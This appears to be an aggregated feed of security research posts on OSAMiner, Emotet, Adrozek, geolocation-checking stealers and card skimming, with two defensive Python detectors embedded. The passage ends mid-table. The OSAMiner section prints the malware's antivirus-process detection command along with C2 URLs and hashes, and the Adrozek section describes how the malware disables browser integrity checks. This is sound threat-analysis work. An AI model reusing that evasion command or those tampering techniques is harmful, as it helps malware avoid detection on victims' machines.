Recently, Check Point Research (CPR) encountered several attacks that are exploiting multiple vulnerabilities on Linux devices, including some recently discovered flaws. These ongoing attacks involve a new malware variant, called ‘FreakOut.’ The goal behind these attacks is to create an IRC botnet (a collection of machines infected with malware that can be controlled remotely), which…

The post Linux users should patch now to block new “FreakOut” malware which exploits new vulnerabilities appeared first on Check Point Software.


A vulnerability, which was classified as problematic, was found in Malwarebytes up to 3.x on macOS (Anti-Malware Software). Affected is the function posix_spawn of the component Launch Daemon. Upgrading to version 4.0 eliminates this vulnerability.


An anonymous reader quotes a report from ZDNet: For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.


An issue was discovered in Malwarebytes before 4.0 on macOS. A malicious application was able to perform a privileged action within the Malwarebytes launch daemon. The privileged service improperly…

Read the original article: Expert launched Malvuln, a project to report flaws in malware. The security researcher John Page (aka hyp3rlinx) launched malvuln.com, the first website exclusively dedicated to research into security flaws in malware code.

This week the team at SentinelLabs released an in-depth analysis of macOS.OSAMiner, a Monero mining trojan infecting macOS users since 2015. The authors of macOS.OSAMiner used run-only AppleScripts which made attempts at further analysis more difficult.

In 2020, the SentinelLabs Team discovered that the malware authors were evolving their evasion techniques, adding more complexity by embedding one run-only AppleScript inside another. We analyzed one of the latest samples “com.apple.4V.plist” using VMRay Analyzer. In this Malware Analysis Spotlight, we will showcase the key behaviors identified during the dynamic analysis.

Note, at the time of analysis this sample of OSAMiner had a 2/60 detection rate on VirusTotal.

OSAMiner Analysis

The “com.apple.4V.plist” file is placed in ~/Library/LaunchAgents by the original dropper and disguised as a Property list configuration file (PLIST) while it is in fact a compiled AppleScript.

Straight away, we see that a number of VMRay Threat Identifier (VTI) rules hit and the sample is classified as malicious. From the Overview Tab, we can see the main behaviors of the sample including network connectivity, file dropping behavior, and system information gathering. Now we can dig deeper into each of these characteristics.

macOS.OSAMINER - VTI rules

The Network Tab shows multiple C2 connections. The first request to budaybu100001[.]com:8080 returns the second-stage URL embedded in the string “-=-=-=” as a marker. Interestingly, there are two URLs that returned. The second one might be a fallback or used by another variant of the family.

macOS.OSAMINER - Network tab

macOS.OSAMINER - Hex Dump

The second stage is another compiled AppleScript stored at ~/Library/11.png. All downloads are performed using curl which is clearly visible in the Behavior Tab. The second stage is again executed using “osascript” and has two main tasks:

Download and extract the third stage mining payload
Write the mining configuration (pools.txt, config.txt, cpu.txt)

macOS.OSAMINER - Second Stage_curl

macOS.OSAMINER - Mining Configuration

The third stage is a zip file containing two dynamic libraries (dylibs) and finally a Mach-O binary, again disguised as a PLIST which can be clearly seen in the Files Tab.

macOS.OSAMINER - Dynamic Libraries (Dylibs)

macOS.OSAMINER - Mach-O binary

In addition, the second stage uses the system tool “caffeinate” to prevent the machine from going to sleep while the first stage will continuously query the running processes for common AV programs using the ps command:

sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'

All of these actions are performed using sub-processes so they can be observed in the process graph and process overview.

macOS.OSAMINER - Process Overview

macOS.OSAMiner - Process Graph (2)

As we can see, this sample uses a different kind of evasion, using a rather uncommon file type, a compiled AppleScript, disguised as a PLIST file. This file type won’t have a problem running on a victim’s machine but it is difficult for security teams to analyze because of the inherent obfuscation and limited tooling available.
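The disguise described above is cheap to unmask at triage time, because a compiled AppleScript and a property list start with different magic bytes whatever the file extension says. The helper below is an added example, not VMRay's or SentinelLabs' tooling; the byte strings it is tested against are constructed, and the magic values it relies on are compiled AppleScript "FasdUAS", binary plist "bplist00" and XML plist "<?xml".

```python
"""Triage helper: flag files whose name says PLIST but whose bytes say
compiled AppleScript. Added example, not VMRay's or SentinelLabs' code.
Magic numbers relied on: compiled AppleScript files begin with b"FasdUAS",
binary plists with b"bplist00", XML plists with b"<?xml" (possibly after
a UTF-8 BOM). Any sample bytes fed to these functions are constructed."""
import glob
import os

APPLESCRIPT_MAGIC = b"FasdUAS"
BPLIST_MAGIC = b"bplist00"
XML_MAGIC = b"<?xml"
UTF8_BOM = b"\xef\xbb\xbf"


def classify_header(data: bytes) -> str:
    """Return 'applescript', 'plist' or 'unknown' from the leading bytes."""
    head = data[:16]
    if head.startswith(UTF8_BOM):
        head = head[len(UTF8_BOM):]
    if head.startswith(APPLESCRIPT_MAGIC):
        return "applescript"
    if head.startswith(BPLIST_MAGIC) or head.lstrip().startswith(XML_MAGIC):
        return "plist"
    return "unknown"


def is_masquerading_plist(path: str, data: bytes) -> bool:
    """True when the name claims .plist but the content is a compiled AppleScript,
    the pattern used by the com.apple.4V.plist stage discussed above."""
    return path.lower().endswith(".plist") and classify_header(data) == "applescript"


def scan_directory(directory: str):
    """Return the .plist files in `directory` that are really compiled AppleScripts.
    Only the first 32 bytes of each file are read."""
    hits = []
    for path in sorted(glob.glob(os.path.join(directory, "*.plist"))):
        try:
            with open(path, "rb") as fh:
                data = fh.read(32)
        except OSError:  # unreadable file: skip rather than abort the sweep
            continue
        if is_masquerading_plist(path, data):
            hits.append(path)
    return hits


if __name__ == "__main__":
    # Persistence location named in the analysis above; expand for other users
    # (/Library/LaunchAgents, /Library/LaunchDaemons) as needed.
    for hit in scan_directory(os.path.expanduser("~/Library/LaunchAgents")):
        print(f"compiled AppleScript disguised as plist: {hit}")
```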

Running the sample in VMRay gives analysts an immediate view into the key behaviors, characteristics, and IOCs. Within 2 minutes of analysis time, analysts can see a majority of the sample’s behavior, compared to hours of manual reverse engineering. And for deeper analysis, the second and third stages are visible and available from the VMRay Analyzer Report.

IOCs

Sample: com.apple.4V.plist
df550039acad9e637c7c3ec2a629abf8b3f35faca18e58d447f490cf23f114e8

Second Stage: ~/Library/11.png
ff9fa2ee1d42cbde7307c10907470e4950db5085d9cb43c3ade118da9bfe35c3

Third Stage: ~/Library/Caches/com.apple.l0/ssl4.plist
97febb1aa15ad7b1c321f056f7164526eb698297e0fea0c23bd127498ba3e9bb

AV Detection Script embedded in First Stage: ~/Library/k.plist
0cc04703ae218b0217e1b025de60cec82087e0774eb59b984419949cee5c2173

Network
hxxp://www.budaybu100001[.]com:8080
hxxp://budaybu[.]com:8080/budaybu.png
hxxp://ondayon[.]com:8080/ondayon.png (possibly backup URL)
hxxp://budaybu[.]com:8080/ssl.zip
budaybu[.]com:8888 (mining pool address)

Process names checked by the AV Detection Script embedded in First Stage
360, Keeper, MacMgr, Lemon, Malware, Avast, Avira, CleanMyMac

The post Malware Analysis Spotlight: OSAMiner Uses Run-Only AppleScripts to Evade Detection appeared first on VMRay.

Overview

Emotet malware has been around since 2014, but 2020 saw a resurgence of attacks. In September 2020, Emotet affected 14% of organizations worldwide. So, what is Emotet? And why is it so dangerous?

Emotet is a sophisticated trojan that is most commonly used as a dropper for other malware. This means that after gaining access to an Emotet-infected device, its operators can download additional malicious payloads, also known as second-stage payloads, to the compromised machine.

Those second-stage payloads can be any type of malicious code, from other Emotet extensions and modules to other malware such as ransomware.

Emotet is usually propagated via phishing email attachments or embedded links that, once opened or clicked, launch the malicious payload. The malware then attempts to move laterally within a network by brute-forcing user credentials and writing to shared drives.

Since early this year, numerous agencies and security vendors have reported a significant increase in cybercriminals targeting victims using Emotet phishing emails. This increase flags Emotet as one of the most prevalent and continuous threats.

Emotet Infection in the Wild

During 2020, Akamai was able to track some of the activity related to Emotet infections in the wild by monitoring access to websites associated with Emotet malware. Sampled traffic from numerous geographies showed a strong increase in Emotet infections in February, July, and October 2020. Other security vendors observed the same uptick.

How to Minimize the Risk of Emotet 

As with all malware, adopting a defense-in-depth approach is your best chance of blocking Emotet early in the kill chain. A cloud-based secure web gateway (SWG) that looks at all outbound DNS and URLs can block requests to Emotet delivery sites early and before any IP connection is made. In the event that a device does get compromised, that same security control point can proactively block requests to CNC servers when the malware attempts to download secondary payloads. 

Deploying an SWG that has multiple payload analysis engines in combination with an endpoint AV or EDR is also recommended. That allows you to block the Emotet payload.

To block the initial infection, add an additional layer of protection over and above your email gateway. For example, a solution that can provide real-time protection when a malicious link is clicked and can verify the resource being requested adds additional protection and can block non-email phishing attempts, such as those delivered via social media or messaging apps. 

Finally, ensure that you continue to educate users about phishing: Do not open attachments or click on URLs… and always err on the side of caution.

GoingRogue_blog.jpg

Now more than ever, we rely on our smartphones to keep in touch with our work, our families and the world around us. There are over 3.5 billion smartphone users worldwide, and it is estimated that over 85% of those devices – around 3 billion – run the Android OS. So it’s no surprise that…

The post Going Rogue – a Mastermind Behind Android Malware Returns with a New RAT appeared first on Check Point Software.

This blog was written by Ofer Caspi and Fernando Martinez of AT&T Alien Labs

Multiple threat actors have recently started using a Go language (Golang) tool to act as a packer and avoid antivirus detection. Additionally, the Ezuri memory loader tool acts as a malware loader and executes its payload in memory, without writing the file to disk. While this technique is well known and commonly used by Windows malware, it is less popular in Linux environments.

The loader decrypts the malicious payload and executes it using memfd_create (as described in this blog in 2018). When creating the process, the system returns a file descriptor to an anonymous file under '/proc/PID/fd/', which is the only place in the filesystem where it is visible.

Figure 1 shows a code snippet from the loader, containing the information it uses in order to decrypt the payload using the AES algorithm.

Figure 1. Loader code snippet via Alien…

Posted by: Ofer Caspi


Our latest Global Threat Index for December 2020 has revealed that the Emotet trojan has returned to first place in the top malware list, impacting 7% of organizations globally, following a spam campaign which targeted over 100,000 users per day during the holiday season. In September and October 2020, Emotet was consistently at the top…

The post December 2020’s Most Wanted Malware: Emotet Returns as Top Malware Threat appeared first on Check Point Software.


Last week, I found a malware sample that does nothing fancy, it’s a data stealer, but it has an interesting feature. It’s always interesting to have a look at the network flows generated by malware samples. For a while now, attackers have used GeoIP API services to test whether the victim’s computer deserves to be infected… or not! By checking the public IP address used by the victim, an attacker might prevent “friends” from being infected (e.g. IP addresses from the attacker’s country) or skip the infection if the IP address belongs to a security vendor. On the other side, the attacker might decide to infect the computer because it is located in a specific country or belongs to the targeted organization. There are plenty of free APIs that offer this feature. The ISC API also provides the same kind of details (but only the country):

remnux@remnux:~$ curl -s https://isc.sans.edu/api/ip/195.74.193.12?json | jq '.ip.ascountry'
"BE"

The sample that I found (SHA256:D196E2BBCAF21D3335D72F8E2F2691474BA625E6B01C4DB41A1F91FC41A5EBDF) has a VT score of 41/69[1]. It uses the .Net framework tool regsvcs.exe[2] to execute malicious code extracted by the first stage file. The malware performs the following queries. First, it queries for the victim’s public IP address with the help of icanhazip.com:

remnux@remnux:~$ curl -s http://icanhazip.com/
81.246.x.x

The second service used is api.mylnikov.org:

remnux@remnux:~$ curl -s 'https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:0c:29:xx:xx:xx'
{"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1608552093}

This free service provides geolocation data for WiFi MAC addresses or BSSID. This is also useful to detect the location of the victim. The malware submits the MAC address of the default gateway (in my VM environment) or the BSSID (the MAC address of the wireless access point). In my case, it did not work of course but here is an example of valid BSSID:

remnux@remnux:~$ curl -s 'https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:0C:42:1F:65:E9'
{"result":200, "data":{"lat": 45.22038682066, "range": 141.727, "lon": 16.54741327415, "time": 1608560868}}

You can see that only latitude and longitude are returned in the JSON data but it’s easy to get back the country/city using another public service:

remnux@remnux:~$ curl -s 'https://geocode.xyz/45.22,16.54?geoit=json' | jq '.state'
"BA"

“api.mylnikov.org” seems to be an interesting observable! 
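The observable is stronger as a sequence than as a single hostname: a host that asks for its public IP and then, within a couple of minutes, queries a WiFi geolocation or reverse-geocoding service is reproducing the check walked through above. The detector below is an added example, not part of the diary; the proxy log lines it runs over are constructed in a simplified "<epoch> <client_ip> <method> <url>" format, and the 120-second window is an assumed tuning value.

```python
"""Flag clients that chain a public-IP lookup with a geolocation lookup,
the pre-infection check described in the diary above. Added example, not
part of the ISC diary. LOG is constructed in a simplified proxy format:
    <epoch> <client_ip> <method> <url>
The service list comes from the diary; the 120 s window is an assumption."""
import re
from collections import defaultdict

GEO_SERVICES = {
    "icanhazip.com": "public-ip",
    "api.mylnikov.org": "wifi-geolocation",
    "geocode.xyz": "reverse-geocode",
    "isc.sans.edu": "geoip",          # only its /api/ip/ endpoint counts
}
WINDOW_SECONDS = 120

# Constructed sample: 10.0.0.5 performs the full chain, 10.0.0.9 only asks
# for its public IP (a common, benign thing for tooling to do).
LOG = """\
1608552000 10.0.0.5 GET http://icanhazip.com/
1608552012 10.0.0.5 GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:0c:29:aa:bb:cc
1608552020 10.0.0.5 GET https://geocode.xyz/45.22,16.54?geoit=json
1608552100 10.0.0.9 GET https://www.example.com/index.html
1608559000 10.0.0.9 GET http://icanhazip.com/
1608559005 10.0.0.9 GET https://isc.sans.edu/diary.html
"""

LINE_RE = re.compile(r"^(\d+) (\S+) (\S+) (\S+)$")


def classify_url(url: str):
    """Return the service kind for a URL, or None when it is not a geo lookup."""
    host = url.split("://", 1)[-1].split("/", 1)[0].split(":")[0].lower()
    if host == "isc.sans.edu" and "/api/ip/" not in url:
        return None
    return GEO_SERVICES.get(host)


def find_geo_probe_sequences(log_text: str, window: int = WINDOW_SECONDS):
    """Return {client_ip: [(ts, kind, url), ...]} for clients that hit a public-IP
    lookup followed by at least one geolocation service within `window` seconds.
    A lone public-IP lookup is deliberately not reported."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue                      # malformed line: skip, do not abort
        ts, client, _method, url = match.groups()
        kind = classify_url(url)
        if kind:
            per_client[client].append((int(ts), kind, url))

    hits = {}
    for client, events in per_client.items():
        events.sort()
        for index, (ts, kind, _url) in enumerate(events):
            if kind != "public-ip":
                continue
            followups = [e for e in events[index + 1:]
                         if e[0] - ts <= window and e[1] != "public-ip"]
            if followups:
                hits[client] = [events[index]] + followups
                break
    return hits


if __name__ == "__main__":
    for client, chain in find_geo_probe_sequences(LOG).items():
        print(client, "->", " ; ".join(kind for _, kind, _ in chain))
```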

[1] https://www.virustotal.com/gui/file/d196e2bbcaf21d3335d72f8e2f2691474ba625e6b01c4db41a1f91fc41a5ebdf/detection
[2] https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool
[3] https://www.mylnikov.org

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

By Jon Munshaw.
Nothing was normal in 2020. Our ideas of working from offices, in-person meetings, hands-on learning and basically everything else were thrown into disarray early in the year. Since then, we defenders have had to adapt. But so have workers around the globe, and the IT and security professionals in charge of keeping those workers’ information secure.
Adversaries saw all these changes as an opportunity to capitalize on strained health care systems, schools scrambling…


As the holiday shopping season shifts into high gear, the COVID-19 pandemic is accelerating an ongoing trend: shoppers are opting to buy online.

Rather than flooding brick-and-mortar stores — and point-of-sale (POS) machines — with sales, studies suggest a high percentage of shoppers in 2020 will be using online options and e-commerce checkout pages. And, those checkout pages are exactly what cyber criminals are targeting — injecting malicious code into them that will send payment card data directly back to the attackers in a technique some refer to as e-skimming.

For malicious cyber actors, this shift to online commerce has implications: using POS malware to steal payment card data is less profitable than it once was, especially when compared to exploiting vulnerable e-commerce checkout pages. Supporting data from IBM Security X-Force shows a drop in POS malware use, an increase in e-commerce card skimming and a general cyber criminal exodus from the POS malware scene. And, with more shoppers opting for online sales this year — a development some analysts expect will persist beyond the pandemic — these trends are likely to accelerate.

E-commerce Threats on the Rise

X-Force data indicates incidents involving e-commerce threats have increased nearly 400% since 2018. Some of these incidents have involved attacks from a collection of groups called Magecart, where threat actors inject malicious JavaScript code into e-commerce checkout pages, sending payment card data directly to the attackers. Other incidents have included SQL injection to exfiltrate data from externally hosted e-commerce servers or the creation of fake subdomains to commit fraud on e-commerce websites.

Figure 1: E-commerce incidents remediated by X-Force Incident Response, as portrayed as a percentage of total incidents from 2018-2020 (Source: X-Force)

Rising E-commerce Skimming Sophistication

As attackers focus additional energy on e-commerce card-skimming operations, their tactics have become increasingly sophisticated.

One example is online card skimmers that inject malicious JavaScript code into e-commerce checkout pages, which have evolved to incorporate anti-forensic techniques, such as self-removal, to make detection and analysis of the malicious code more difficult. In other cases, attackers have used forms of steganography to hide malicious code in images on the compromised site, as well as the stolen payment card data while exfiltrating it from compromised websites.

In addition, for threat actors involved in e-commerce skimming, checkout pages built on the same platform can enable attacks against multiple victims at once. In July 2020, researchers revealed that a Magecart group IBM tracks as Hive0059 (aka Magecart Group 8 or Keeper) compromised over 570 online shops over a three-year period. Of the compromised sites, 85% used the same underlying platform. With e-commerce skimming attacks, one vulnerability can help attackers automate the same attack for many others, harvesting card data that can impact a large number of shoppers.

As e-commerce is set to explode this holiday season, card skimming continues to be increasingly profitable and threat actors are likely to continually adapt and improve their techniques.

As E-commerce Threats Rise, POS Malware is in Decline

POS malware planted on physical payment processing devices has enabled threat actors to steal payment card data from terminals at retail stores, hotels, restaurants and other establishments since at least 2008. Several large-scale POS malware attacks brought this attack type to the headlines particularly in 2014 — including the Target breach that affected 41 million payment card accounts, and signaled the heyday of this attack type.

POS malware remained popular through 2017, but as chip-and-PIN technologies are being used by more card issuers worldwide, the effectiveness of POS malware has been decreasing.

Chip-and-PIN equipped cards — also known as EMV (Europay, MasterCard and Visa, the originators of the technology) — encrypt card data during a transaction, hindering an attacker’s ability to scrape the data from a payment card terminal. Often, attackers are seeking to steal payment card information to turn around and sell that data on the darknet for a profit. The lower the number of payment cards the attacker can steal, the lower their profit. Ultimately, attackers are finding POS malware not profitable enough to continue these attacks in the same volume as in 2014-2017.

What IBM Data Tells Us: POS Malware Attacks Have Declined Since 2018

Looking at X-Force data from 2020, a continual decline in POS malware is most notable in the retail sector, which has experienced the vast majority of POS malware attacks X-Force has remediated in past years. In 2018, POS malware attacks in the retail sector made up 13% of all attacks in that industry. In 2019, that percentage shrank to 6%; in 2020, although some attacks were reported globally, our team did not respond to any POS malware attacks on retail organizations.

Figure 2: POS Malware Attacks Against Retail Have Decreased Significantly Since 2018 (Source: X-Force)

Similarly, IBM Managed Security Services (MSS) data gathered from our monitored customers demonstrates a similar trend. Compared to the typical volume of network traffic associated with active malware strains, 2020 showed minuscule detections for POS malware across all sectors.

While X-Force data suggests that POS malware attacks are becoming rare in 2020, other vendors continue to see sporadic attacks. According to one report from Visa, threat actors in May and June 2020 were using various types of POS malware in attempts to harvest payment card data from victimized merchants. In addition, an X-Force search on VirusTotal for six well-known POS malware families returned around 2,000 samples that have recent detections and have been submitted and compiled on or after Oct. 1, 2020.

Even so, it is unclear how successful contemporary POS malware attacks are. One new strain of POS malware discovered in November was designed to harvest only cardholders’ names, rather than payment card information — suggesting that some POS malware attackers in 2020 are intentionally targeting only personally identifying information, rather than full payment card information.

Regardless of their success, X-Force analysts recognize that POS malware is not gone just yet.

Financially Motivated Actors Exiting the POS Malware Scene

X-Force researchers are following closely several groups who in the past have actively deployed POS malware on merchants across the world. Two such groups in particular — ITG08 and ITG14 — appear to have broadened their attack arsenal, diversifying to other types of cyber crime, and potentially exiting the POS malware scene altogether.

ITG08

An advanced cyber criminal group X-Force tracks as ITG08 has campaign overlap with FIN6 and has been active since at least April 2016. Historically, this group has focused on deploying POS malware — particularly the FrameworkPOS malware — and then stealing payment card data and posting this for sale on the darknet. However, X-Force and other vendors’ research from 2019 suggests that ITG08 has expanded its operations to include e-commerce card skimmers — online transactions where a credit card is not physically present — and is connected to e-commerce card group Magecart Group 6.

Some security researchers believe ITG08 has been involved in ransomware operations. The group has reportedly been involved in Ryuk and LockerGoga ransomware attacks in 2019. Additionally, X-Force observed a threat actor using tactics and techniques very similar to ITG08 attempt to deploy MegaCortex ransomware in 2019. Therefore, X-Force analysts consider it plausible that ITG08 actors have expanded operations beyond payment card theft to ransomware operations — a segment of the cyber crime market that is becoming increasingly lucrative. The comparative income-generating opportunities from ransomware compared to POS malware may even, conceivably, have prompted ITG08 to exit the POS malware market.

X-Force incident response has not observed ITG08 deploy POS malware since 2018. And, threat intelligence analysts are not aware that any other vendors have observed this group deploying POS malware in 2020, either.

ITG14

A separate advanced cybercriminal group IBM tracks as ITG14 shares campaign overlap with FIN7. This group also has aggressively deployed POS malware on victim networks in the past. According to the U.S. Department of Justice, as of 2018 this group had stolen more than 15 million credit card numbers from over 3,600 businesses in the U.S. alone.

In mid-2020, X-Force researchers were able to identify ITG14 as at least one affiliate group propagating the Sodinokibi ransomware. A 64-bit Carbanak backdoor used in a Sodinokibi ransomware attack observed by X-Force matched a backdoor known to be used by ITG14, and not attributed to any other group. For this reason, X-Force analysts assess that ITG14 has widened its attack activity to include ransomware attacks. It is possible that ITG14 is devoting more attention to ransomware operations in 2020, given the comparable profitability of Sodinokibi ransomware operations — pulling in over $100 million in 2020 by October alone, according to one interview with a Sodinokibi actor. While ITG14 would receive only a portion of the ransomware payments for the operations in which the group was involved, these profits are still likely to be higher than those associated with POS malware attacks in 2020.

Will POS Malware Decline into Oblivion?

While POS malware is in considerable decline in 2020, it has the potential to rise again if cyber criminals find new ways of circumventing chip-and-PIN technologies.

In July 2020, security blogger Brian Krebs indicated that several U.S. merchants had suffered attacks that sidestepped chip card security controls. The problem associated with chip-and-PIN controls in that case appeared to be a security misconfiguration on the part of the card issuer, where backend systems accepted transactions with information that should have been specific to one transaction only.

Even so, cases of circumventing chip-and-PIN technologies appear to be rare. The profitability of POS malware attacks is declining over time, pushing threat actors out of the POS malware scene and into e-commerce skimming, as well as other more lucrative attack methodologies. X-Force analysts are reluctant to conclude that POS malware is dead, given the potential for malware innovation. At least for now, prior POS malware actors appear to be focusing more attention on e-commerce payment card theft, ransomware attacks and potentially other attack types.

Shifting Focus to E-commerce Protection, Ransomware Response

As X-Force observes fewer POS malware attacks each year, e-commerce payment card theft attacks are rising in its place. The threat actors who once dominated the POS malware space have now expanded — and probably moved on — to focus on e-commerce attacks and ransomware operations. This development suggests that retail, restaurant, hotel and other establishments frequently targeted for payment card data will want to focus security on e-commerce threats or even to prepare for ransomware attacks. 

X-Force analysts recommend assessing risk from relevant threats, preparing incident response plans for e-commerce and ransomware attacks and rehearsing incident response plans to ensure that teams can respond quickly and effectively if ever an incident is discovered.

Recommendations

Implement a strategy to prevent unauthorized data theft, especially as it applies to uploading large amounts of data to legitimate cloud storage platforms that attackers can abuse.
Harden web applications and underlying infrastructure to prevent malicious code injection.
Encrypt card data in transit and at rest to protect customer data from unauthorized use if it is ever compromised.
Establish and maintain offline data backups to assist in rapid recovery should data be lost due to a ransomware attack.
Employ user behavior analytics to identify potential security incidents.
Employ multifactor authentication on all access points into an enterprise network.
Use penetration testing to identify weak points in enterprise networks and vulnerabilities that should be prioritized for patching.
Plan and rehearse incident response procedures for cases of a data breach or ransomware threat.

The post E-Commerce Skimming is the New POS Malware appeared first on Security Intelligence.

A persistent malware campaign has been actively distributing an evolved browser modifier malware at scale since at least May 2020. At its peak in August, the threat was observed on over 30,000 devices every day. The malware is designed to inject ads into search engine results pages. The threat affects multiple browsers—Microsoft Edge, Google Chrome, Yandex Browser, and Mozilla Firefox—exposing the attackers’ intent to reach as many Internet users as possible.

We call this family of browser modifiers Adrozek. If not detected and blocked, Adrozek adds browser extensions, modifies a specific DLL per target browser, and changes browser settings to insert additional, unauthorized ads into web pages, often on top of legitimate ads from search engines. The intended effect is for users, searching for certain keywords, to inadvertently click on these malware-inserted ads, which lead to affiliated pages. The attackers earn through affiliate advertising programs, which pay by amount of traffic referred to sponsored affiliated pages.

Figure 1. Comparison of search results pages on an unaffected machine and one with Adrozek running.

Cybercriminals abusing affiliate programs is not new—browser modifiers are some of the oldest types of threats. However, the fact that this campaign utilizes a piece of malware that affects multiple browsers is an indication of how this threat type continues to be increasingly sophisticated. In addition, the malware maintains persistence and exfiltrates website credentials, exposing affected devices to additional risks.

Such a sustained, far-reaching campaign requires an expansive, dynamic attacker infrastructure. We tracked 159 unique domains, each hosting an average of 17,300 unique URLs, which in turn host more than 15,300 unique, polymorphic malware samples on average. In total, from May to September 2020, we recorded hundreds of thousands of encounters of the Adrozek malware across the globe, with heavy concentration in Europe and in South Asia and Southeast Asia. As this campaign is ongoing, this infrastructure is bound to expand even further.

Figure 2. Geographic distribution of Adrozek encounters from May to September 2020.

Effectively protecting against rampant, persistent campaigns like this that incorporate multiple components, polymorphism, and evolved malware behavior requires advanced, behavior-based detection and visibility across the whole attack chain rather than specific components. In this blog, we’ll share our in-depth analysis of this campaign, including the distribution architecture and malware behavior, and provide recommended defenses.

Distribution infrastructure

The Adrozek malware is installed on devices through drive-by download. In our tracking of the Adrozek campaign from May to September 2020, we saw 159 unique domains used to distribute hundreds of thousands of unique malware samples. Attackers relied heavily on polymorphism, which allows attackers to churn huge volumes of samples as well as to evade detection.

While many of the domains hosted tens of thousands of URLs, a few had more than 100,000 unique URLs, with one hosting almost 250,000. This massive infrastructure reflects how determined the attackers are to keep this campaign operational.

Figure 3. Number of URLs and number of files hosted on Adrozek domains with at least 100 files.

The distribution infrastructure is also very dynamic. Some of the domains were up for just one day, while others were active for longer, up to 120 days. Interestingly, we saw some of the domains distributing clean files like Process Explorer, likely an attempt by the attackers to improve the reputation of their domains and URLs, and evade network-based protections.

Installation

Attackers use this sprawling infrastructure to distribute hundreds of thousands of unique Adrozek installer samples. Each of these files is heavily obfuscated and uses a unique file name that follows this format: setup_<application name>_<numbers>.exe.

Figure 4. Adrozek attack chain

When run, the installer drops an .exe file with a random file name in the %temp% folder. This file in turn drops the main payload in the Program Files folder using a file name that makes it look like legitimate audio-related software. We have observed the malware use various names like Audiolava.exe, QuickAudio.exe, and converter.exe. The malware is installed like a usual program that can be accessed through Settings > Apps & features, and registered as a service with the same name.

Figure 5. Adrozek installed as a program that can be accessed through the Apps & features setting

Modifying browser components

Once installed, Adrozek makes multiple changes to the browser settings and components. These changes allow the malware to inject ads into search engine result pages.

Extensions

The malware makes changes to certain browser extensions. On Google Chrome, the malware typically modifies “Chrome Media Router”, one of the browser’s default extensions, but we have seen it use different extensions.

Each extension on Chromium-based browsers has a unique 32-character ID that users can use to locate the extension on machines or on the Chrome Web store. On Microsoft Edge and Yandex Browser, it uses IDs of legitimate extensions, such as “Radioplayer” to masquerade as legitimate. As it is rare for most of these extensions to be already installed on devices, it creates a new folder with this extension ID and stores malicious components in this folder. On Firefox, it appends a folder with a Globally Unique Identifier (GUID) to the browser extension. In summary, the paths and extension IDs used by the malware for each browser are below:

| Browser | Extension path examples |
|---|---|
| Microsoft Edge | %localappdata%\Microsoft\Edge\User Data\Default\Extensions\fcppdfelojakeahklfgkjegnpbgndoch |
| Google Chrome | %localappdata%\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm (might vary) |
| Mozilla Firefox | %appdata%\Roaming\Mozilla\Firefox\Profiles\<profile>\Extensions\{14553439-2741-4e9d-b474-784f336f58c9} |
| Yandex Browser | %localappdata%\Yandex\YandexBrowser\User Data\Default\Extensions\fcppdfelojakeahklfgkjegnpbgndoch |

Despite targeting different extensions on each browser, the malware adds the same malicious scripts to these extensions. In some cases, the malware modifies the default extension by adding seven JavaScript files and one manifest.json file to the target extension’s file path. In other cases, it creates a new folder with the same malicious components.

Figure 6. JavaScript and JSON files added to the target extension’s file path

These malicious scripts connect to the attacker’s server to fetch additional scripts, which are responsible for injecting advertisements into search results. The domain name of the remote server is specified in the extension’s scripts. The malware also sends information about the device to the said remote server.

Figure 7. Additional downloaded script

Browser DLLs

The malware also tampers with certain browser DLLs. For instance, on Microsoft Edge, it modifies MsEdge.dll to turn off security controls that are crucial for detecting any changes in the Secure Preferences file.

Figure 8. Comparison of original and tampered with MsEdge.dll.

This technique impacts not only Microsoft Edge but other Chromium-based browsers. These browsers store user settings and preferences, such as home page and default search engine, in the Preferences file. For each of the four target browsers, it modifies the relevant DLL:

| Browser | Modified files |
|---|---|
| Microsoft Edge | %PROGRAMFILES%\Microsoft\Edge\Application\<version>\msedge.dll; %localappdata%\Microsoft\Edge\User Data\Default\Secure Preferences; %localappdata%\Microsoft\Edge\User Data\Default\Preferences |
| Google Chrome | %PROGRAMFILES%\Google\Chrome\Application\<version>\chrome.dll; %localappdata%\Google\Chrome\User Data\Default\Secure Preferences; %localappdata%\Google\Chrome\User Data\Default\Preferences |
| Yandex Browser | %PROGRAMFILES%\Yandex\YandexBrowser\<version>\browser.dll; %localappdata%\Yandex\YandexBrowser\User Data\Default\Secure Preferences; %localappdata%\Yandex\YandexBrowser\User Data\Default\Preferences |
| Firefox | %PROGRAMFILES%\Mozilla Firefox\omni.ja; %appdata%\Mozilla\Firefox\Profiles\<profile>\extensions.json; %appdata%\Mozilla\Firefox\Profiles\<profile>\prefs.js |

Browser security settings

Browsers have security settings that defend against malware tampering. The Preferences file, for example, contains sensitive data and security settings. Chromium-based browsers detect unauthorized modifications to these settings through signatures and validation on several preferences. These preferences, as well as configuration parameters, are stored in a JSON file named Secure Preferences.

The Secure Preferences file is similar in structure to the Preferences file, except that the former adds a hash-based message authentication code (HMAC) for every entry in the file. This file also contains a key named super_mac that verifies the integrity of all HMACs. When the browser starts, it validates the HMAC values and the super_mac key by calculating the HMAC-SHA256 of some of the JSON nodes and comparing the results with the stored values. If it finds values that don’t match, the browser resets the relevant preference to its default value.

In the past, browser modifiers calculated the hashes the same way browsers do and updated the Secure Preferences file accordingly. Adrozek goes one step further and patches the function that launches the integrity check. The two-byte patch nullifies the integrity check, which leaves the browser more vulnerable to hijacking or tampering.

Figure 9. Two-byte patch to the function in Secure Preferences file that launches the integrity check

With the integrity check disabled, Adrozek proceeds to modify security settings. On Google Chrome or Microsoft Edge, the malware modifies the following entries in the Secure Preferences file to add permissions that enable the malicious extensions to have more control over Chrome APIs:

| Entry in Secure Preferences file | Value | Result |
|---|---|---|
